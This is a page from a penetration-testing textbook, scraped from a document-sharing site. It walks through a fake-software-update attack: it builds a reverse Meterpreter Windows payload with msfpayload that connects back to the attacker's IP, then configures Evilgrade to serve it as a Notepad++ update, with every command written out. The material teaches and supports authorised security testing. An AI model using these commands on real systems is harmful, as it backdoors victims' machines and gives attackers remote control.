Ethical Hacking and Penetration Testing Guide



Yüklə 22,44 Mb.
Pdf görüntüsü
səhifə141/235
tarix07.08.2023
ölçüsü22,44 Mb.
#138846
1   ...   137   138   139   140   141   142   143   144   ...   235
Ethical Hacking and Penetration Testing Guide ( PDFDrive )

Step 1

Creating a Windows Binary with Msfpayload
The first step would be to create a Windows binary to obtain a reverse Meterpreter shell. This is the 
code that would be executed on the victim’s machine whenever he updates Notepad++. We can use 
the msfpayload to generate a reverse Meterpreter payload.
Command
:
root@bt:~# msfpayload windows/Meterpreter/reverse_tcp 
lhost=192.168.75.144 lport=4444 X > xen.exe
This command will create a Windows binary that will connect back to us on port 4444 giving 
us a Meterpreter session.


Client Side Exploitation
◾ 
225
Step 2

Setting up the Attack on Evilgrade
Evilgrade is installed in the 
/pentest/exploits/isr-evilgrade
directory in BackTrack 5. 
Navigate to the directory and launch it.
Command
:
root@bt:~#cd/pentest/exploits/isr-evilgrade
root@bt:/pentest/exploits/isr-evilgrade#./evilgrade
Step 3

Configuring the DNSAnswerIP
Next, we would set up the DNSAnswerIP to our local IP address. This IP will do the DNS answers 
for us.
Command
:
evilgrade> set DNSAnswerIp 192.168.75.144
Step 4

Configuring the Module
We now need to configure the module that we want to use, the “Show Modules” command lists 
all the modules that are present in evilgrade.
As it is Notepad++ in our case, we will use the following command to configure the module:
evilgrade> configure notepadplus


226
◾ 
Ethical Hacking and Penetration Testing Guide
Next, we will enter the “show options” module to list all the options that can be used with 
this module.
As you can see, we have only two options. The important one is the agent; this will be the 
path to our payload. In my case, I have saved it under /root/xen.exe. I will set it up by using the 
following command:
evilgrade(notepadplus)>set agent/root/xen.exe
Once you are done with it, enter “start” to start the DNS/Webserver.

Yüklə 22,44 Mb.

Dostları ilə paylaş:
1   ...   137   138   139   140   141   142   143   144   ...   235




Verilənlər bazası müəlliflik hüququ ilə müdafiə olunur ©azkurs.org 2024
rəhbərliyinə müraciət

gir | qeydiyyatdan keç
    Ana səhifə


yükləyin